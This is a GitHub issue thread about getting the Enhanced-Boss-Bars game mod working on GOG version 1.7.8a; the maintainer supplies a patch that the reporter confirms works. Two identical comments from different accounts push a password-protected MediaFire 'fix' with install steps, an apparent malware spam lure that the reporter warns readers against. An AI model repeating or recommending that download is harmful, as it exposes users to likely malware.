### ISSUE TITLE
Which revision is the latest one compatible with 1.7.8a?

### ISSUE THREAD

**Issue by mokurin000** [wofsauge/Enhanced-Boss-Bars#27]
I am on game 1.7.8a GOG version, and I find there's no commit message relevant to 1.7.9 update. the latest version will just hide boss bar on 1.7.8

https://github.com/wofsauge/Enhanced-Boss-Bars/tree/ac697e819a63b37c35fe72a0e166091720412161
The latest commit before 1.7.9 release may work
NOTE: don't click links below

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wofsauge** [comment]
A hidden boss bar means, that the mod encountered errors and therefore wasnt able to render stuff.

Can you send us the error messages you see in the debug console?

And does the version you posted work for GoG? If yes, than just use that version of the mod.

**Comment by wofsauge** [comment]
Thanks for the help. Here is a patched version of the latest version of the mod that hopefully should work for GOG. Can you try it out and tell me if it works for you?
[Enhanced-Boss-Bars_gog patch.zip](https://github.com/user-attachments/files/16764500/Enhanced-Boss-Bars_gog.patch.zip)

**Comment by mokurin000** [comment]
> Thanks for the help. Here is a patched version of the latest version of the mod that hopefully should work for GOG. Can you try it out and tell me if it works for you? [Enhanced-Boss-Bars_gog patch.zip](https://github.com/user-attachments/files/16764500/Enhanced-Boss-Bars_gog.patch.zip)

Yes! This works on GOG 1.7.8a

**Comment by wofsauge** [comment]
The fix is now published on the main branch :) thanks for the report. have fun with the mod :)
